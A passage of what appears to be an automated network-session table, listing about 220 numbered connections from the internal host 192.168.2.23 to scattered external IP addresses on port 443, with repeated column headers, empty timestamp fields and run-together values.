                                                11709192.168.2.234534284.118.67.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11710192.168.2.2345790112.219.143.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11711192.168.2.234931681.248.214.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11712192.168.2.234102217.56.12.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11713192.168.2.235812447.100.17.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11714192.168.2.23462125.123.145.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11715192.168.2.233644262.183.49.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11716192.168.2.233593284.255.7.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11717192.168.2.234294235.3.205.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11718192.168.2.2348534206.177.2.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11719192.168.2.235814286.74.226.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11720192.168.2.2355682168.236.95.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11721192.168.2.23460864.53.71.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11722192.168.2.2335968184.71.9.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11723192.168.2.2338654187.157.4.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11724192.168.2.2347676123.167.235.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11725192.168.2.234481619.94.118.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11726192.168.2.2340118199.14.78.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11727192.168.2.2341512116.162.102.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11728192.168.2.234453483.196.103.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11729192.168.2.23577925.13.84.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11730192.168.2.235120249.136.49.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11731192.168.2.234587043.88.95.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11732192.168.2.234423812.52.158.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11733192.168.2.2341044133.22.222.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11734192.168.2.233363649.24.21.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11735192.168.2.2335902218.141.122.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11736192.168.2.2348806181.12.1.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11737192.168.2.236080075.17.243.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11738192.168.2.2357200102.210.194.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11739192.168.2.23483242.158.86.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11740192.168.2.2355862134.142.198.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11741192.168.2.235783897.88.182.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11742192.168.2.2336900125.79.107.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11743192.168.2.234704649.189.149.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11744192.168.2.234334025.79.207.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11745192.168.2.234008049.150.172.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11746192.168.2.2337294173.72.119.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11747192.168.2.2338146193.203.175.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11748192.168.2.2337508145.130.150.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11749192.168.2.235319445.177.108.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11750192.168.2.2355704101.127.246.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11751192.168.2.235890899.29.6.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11752192.168.2.2357288200.146.238.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11753192.168.2.2350202160.35.111.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11754192.168.2.235573225.229.55.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11755192.168.2.2351170194.86.17.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11756192.168.2.2351618182.113.205.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11757192.168.2.2335028143.137.115.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11758192.168.2.234194083.219.253.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11759192.168.2.234267097.143.22.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11760192.168.2.2334392151.119.230.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11761192.168.2.2345674176.82.170.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11762192.168.2.235379820.78.64.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11763192.168.2.2334452141.143.56.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11764192.168.2.2337606220.63.72.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11765192.168.2.234524673.205.31.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11766192.168.2.2348066182.6.140.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11767192.168.2.2338236132.180.44.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11768192.168.2.2352480204.147.115.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11769192.168.2.234653032.227.236.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11770192.168.2.233800214.146.193.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11771192.168.2.234561241.198.197.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11772192.168.2.234311490.73.204.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11773192.168.2.23388281.48.122.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11774192.168.2.2333938221.32.74.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11775192.168.2.2357128171.24.143.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11776192.168.2.2356874177.91.42.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11777192.168.2.233614012.2.46.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11778192.168.2.2338718203.112.170.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11779192.168.2.2342966150.238.138.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11780192.168.2.235618461.93.237.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11781192.168.2.23566005.202.180.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11782192.168.2.234803853.156.93.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11783192.168.2.2345194167.99.186.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11784192.168.2.2347062198.134.85.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11785192.168.2.2347310158.158.106.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11786192.168.2.2355540191.83.199.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11787192.168.2.2360874104.14.149.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11788192.168.2.233388035.219.231.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11789192.168.2.2352550102.40.173.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11790192.168.2.2335880113.66.203.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11791192.168.2.2350818121.208.211.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11792192.168.2.2350216144.69.39.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11793192.168.2.235627018.72.119.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11794192.168.2.235604257.159.62.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11795192.168.2.2335426169.189.107.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11796192.168.2.2355670205.0.169.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11797192.168.2.2337060166.169.81.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11798192.168.2.2341468151.0.17.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11799192.168.2.23582822.140.92.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11800192.168.2.235431420.232.203.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11801192.168.2.2356440161.7.138.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11802192.168.2.235329072.1.26.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11803192.168.2.233770845.61.166.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11804192.168.2.2337438169.154.236.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11805192.168.2.234373487.117.168.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11806192.168.2.2356022111.207.208.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11807192.168.2.2357328143.94.222.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11808192.168.2.2336042152.52.138.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11809192.168.2.2356992165.106.227.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11810192.168.2.235977694.226.3.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11811192.168.2.2359614223.70.172.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11812192.168.2.233703499.35.233.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11813192.168.2.2346164213.97.143.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11814192.168.2.235660878.107.214.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11815192.168.2.234913070.96.39.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11816192.168.2.235755452.183.76.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11817192.168.2.233675095.238.16.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11818192.168.2.2346324154.173.95.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11819192.168.2.23527881.131.101.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11820192.168.2.2360416216.36.252.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11821192.168.2.2349718173.134.83.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11822192.168.2.235696624.204.64.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11823192.168.2.235821065.168.48.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11824192.168.2.2350692181.2.175.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11825192.168.2.2356862173.233.219.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11826192.168.2.233789864.8.23.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11827192.168.2.2343138145.45.198.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11828192.168.2.235692261.171.202.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11829192.168.2.235487651.11.193.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11830192.168.2.235926257.153.81.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11831192.168.2.2350276167.74.74.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11832192.168.2.235748412.199.140.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11833192.168.2.236073250.148.66.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11834192.168.2.234190846.212.7.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11835192.168.2.235358872.130.252.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11836192.168.2.235345638.113.215.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11837192.168.2.2352610182.66.100.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11838192.168.2.235134258.255.224.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11839192.168.2.235397890.56.96.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11840192.168.2.234119061.85.64.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11841192.168.2.235730673.196.239.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11842192.168.2.2333468145.99.38.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11843192.168.2.2349786205.173.191.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11844192.168.2.2333502104.46.147.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11845192.168.2.2355762204.87.250.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11846192.168.2.2338918183.234.192.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11847192.168.2.235428499.26.175.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11848192.168.2.2353058192.10.101.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11849192.168.2.2344864200.208.184.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11850192.168.2.2343358197.198.161.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11851192.168.2.2340592168.130.217.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11852192.168.2.2345766161.197.83.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11853192.168.2.233664071.249.102.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11854192.168.2.2346008207.248.41.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11855192.168.2.234491839.233.47.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11856192.168.2.2335650122.170.57.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11857192.168.2.2353824132.147.23.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11858192.168.2.2333504194.177.51.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11859192.168.2.233636058.49.67.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11860192.168.2.2334364131.244.114.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11861192.168.2.2355552114.196.227.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11862192.168.2.235687089.94.81.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11863192.168.2.233334899.150.125.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11864192.168.2.233646450.102.142.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11865192.168.2.2359416180.32.98.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11866192.168.2.2343210138.250.230.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11867192.168.2.235388849.151.71.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11868192.168.2.2346888165.142.255.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11869192.168.2.23385524.37.162.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11870192.168.2.2342952112.29.57.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11871192.168.2.2334176112.65.228.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11872192.168.2.2333060133.232.128.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11873192.168.2.234084492.193.155.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11874192.168.2.2344176179.6.215.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11875192.168.2.2355702180.182.36.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11876192.168.2.2359260177.129.189.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11877192.168.2.2340818130.67.26.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11878192.168.2.2359124217.138.89.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11879192.168.2.233399087.93.91.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11880192.168.2.2334664209.185.30.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11881192.168.2.2336404186.201.167.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11882192.168.2.2346796199.228.79.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11883192.168.2.2359460207.58.203.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11884192.168.2.233328423.238.67.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11885192.168.2.2345430198.124.145.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11886192.168.2.2335108218.96.60.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11887192.168.2.2350096156.121.15.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11888192.168.2.234023453.161.96.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11889192.168.2.2352222134.13.198.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11890192.168.2.2341460103.198.44.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11891192.168.2.2348222180.132.29.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11892192.168.2.2340050163.17.91.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11893192.168.2.2360312173.206.222.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11894192.168.2.2360626142.161.195.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11895192.168.2.234254094.109.76.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11896192.168.2.234455046.190.254.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11897192.168.2.2349612218.73.192.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11898192.168.2.233798069.197.172.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11899192.168.2.2336314114.196.231.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11900192.168.2.2343142188.7.94.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11901192.168.2.234246899.100.62.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11902192.168.2.235874032.26.186.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11903192.168.2.235413214.58.8.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11904192.168.2.2357326159.145.7.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11905192.168.2.2359374119.95.28.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11906192.168.2.235607619.19.113.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11907192.168.2.235224659.207.194.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11908192.168.2.2344328201.249.239.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11909192.168.2.234855240.247.95.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11910192.168.2.2341546150.31.8.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11911192.168.2.2342242117.53.5.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11912192.168.2.2344040166.83.74.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11913192.168.2.2338542131.6.109.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11914192.168.2.233540896.225.59.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11915192.168.2.235636438.42.132.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11916192.168.2.2360088167.29.76.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11917192.168.2.23447404.214.144.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11918192.168.2.2359650192.143.83.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11919192.168.2.2348172163.115.218.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11920192.168.2.2358916176.250.186.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11921192.168.2.2340422160.241.185.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11922192.168.2.235881849.12.61.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11923192.168.2.235949025.136.170.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11924192.168.2.2339762121.27.201.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11925192.168.2.2344910206.191.107.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11926192.168.2.2339410153.163.0.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11927192.168.2.2335572220.17.14.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11928192.168.2.2360270150.78.138.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11929192.168.2.233621079.122.135.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11930192.168.2.2334930143.202.130.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
